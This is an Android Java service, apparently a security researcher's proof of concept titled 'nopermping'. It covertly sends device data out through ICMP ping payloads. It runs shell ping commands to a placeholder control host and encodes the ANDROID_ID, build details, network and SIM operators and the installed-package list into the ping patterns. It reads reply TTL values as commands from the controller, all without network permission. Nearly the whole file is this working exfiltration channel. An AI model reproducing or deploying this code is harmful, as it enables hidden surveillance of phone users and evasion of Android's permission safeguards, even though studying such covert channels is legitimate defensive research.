package com.leviathansecurity.nopermping;

import android.app.Service;
import android.content.Context;
import android.content.Intent;
import android.content.pm.ApplicationInfo;
import android.content.pm.PackageManager;
import android.os.Build;
import android.os.IBinder;
import android.provider.Settings;
import android.telephony.TelephonyManager;
import android.util.Log;
import android.widget.Toast;

public class Sender extends Service {
	public static final String RUN = "com.leviathansecurity.nopermping.Sender.RUN";
	private final String control = "IP.AD.DRE.SS";
	public String shelloutput = null;
	
	@Override
	public IBinder onBind(Intent arg0) {
		return null;
	}
	
	public int onStartCommand(Intent i, int flags, int startId){	
		int r = senddata("hi");
		Log.d("PingSender","sendddata(hi) = "+r);
		if(r == -1)
			Toast.makeText(this, "No ping reply", 2500).show();
		while(r > 9 && r < 14){
			switch(r){
			case 10:
				String id = Settings.Secure.getString(getContentResolver(), Settings.Secure.ANDROID_ID);
				r = senddata("id="+id);
				break;
			case 11:
				r = senddata("ver="+readVersion());
				break;
			case 12:
				r = senddata("gsm="+readGSM()+"&sim="+readSIM());
				break;
			case 13:
				r = senddata("pkgs="+readPackages());
				break;
			}
			Log.d("PingSender","sendddata() = "+r);
		}
		return START_STICKY;
	}
	
	private int senddata(String input){
		byte[] b = new byte[16];
		byte[] s = input.getBytes();
		int ret = 0;
		int i;
		for(i=0;i < s.length;i++){
			b[i%16] = s[i];
			if(i%16==15)
				ret = senddata16(b);
			if(ret == -1)
				return -1;
		}
		if(i % 16 != 0){
			for(i %= 16;i<16;i++)
				b[i] = 0;
			ret = senddata16(b);
		}
		return ret;
	}
	
	private int senddata16(byte[] data){
		String d ="";
		for(byte nib : data)
			d += String.format("%x",nib);
		while(d.length() < 32)
			d += "0";
		String s = runshell("/system/bin/ping -p "+d+" -s 24 -c 1 "+control);
		if(s.contains("bytes from "+control)){
			int i = s.indexOf("bytes from");
			String ret = s.substring(i-3,i-1);
			try{
				return new Integer(ret).intValue();
			}catch(NumberFormatException e){
				return 0;
			}
		}else{
			return -1;
		}
	}
	
	private String runshell(String command) {
		final int SECS = 1000;
	    ShellThread s = new ShellThread("sh",command,this);
	    s.start();
	    try {
	    	//Log.d("Shell","before");
	    	s.join(SECS);
			if(s.isAlive())
				s.interrupt();
			//Log.d("Shell","after");
		} catch (InterruptedException e) {
			e.printStackTrace();
			s.interrupt();
			Thread.currentThread().interrupt();
		}
	    if(shelloutput != null){
	    	String str = new String(shelloutput);
	    	//Log.i("Shell",str);
	    	shelloutput = null;
	    	return str;
	    }
	    return null;
	}
	
	private String readVersion() {
    	return  "board:"+Build.BOARD+","+
    			"brand:"+Build.BRAND+","+ 
    			"device:"+Build.DEVICE+","+
    			"cpu1:"+Build.CPU_ABI+","+
    			//"cpu2:"+Build.CPU_ABI2+","+
    			"build:"+Build.DISPLAY+","+
    			//"hardware:"+Build.HARDWARE+","+
    			"model:"+Build.MODEL+","+
    			"product:"+Build.PRODUCT+",";
	}
	
	private String readPackages() {
		PackageManager pm = getPackageManager();
		String ret = "";
		for (ApplicationInfo app : pm.getInstalledApplications(0)){
			if(app.className != null && !app.className.equals("Null")){
				if(!ret.equals("")) ret = ret + ",";
				ret = ret + app.className;
			}
		}
		return ret;
	}
	
	private String readGSM() {
    	TelephonyManager tm = (TelephonyManager)getSystemService(Context.TELEPHONY_SERVICE);
    	String op = "0";
    	switch(tm.getPhoneType()){
    	case TelephonyManager.PHONE_TYPE_GSM:
    		op = tm.getNetworkOperator();
        	break;
    	default:
    		break;
    	}
    	return op;
	}

	private String readSIM() {
    	TelephonyManager tm = (TelephonyManager)getSystemService(Context.TELEPHONY_SERVICE);
    	String sim = "0";
    	switch(tm.getSimState()){
    	case TelephonyManager.SIM_STATE_READY:
    		sim = tm.getSimOperator();
    		break;
    	default:
    		break;
    	}
    	return sim;
	}

}
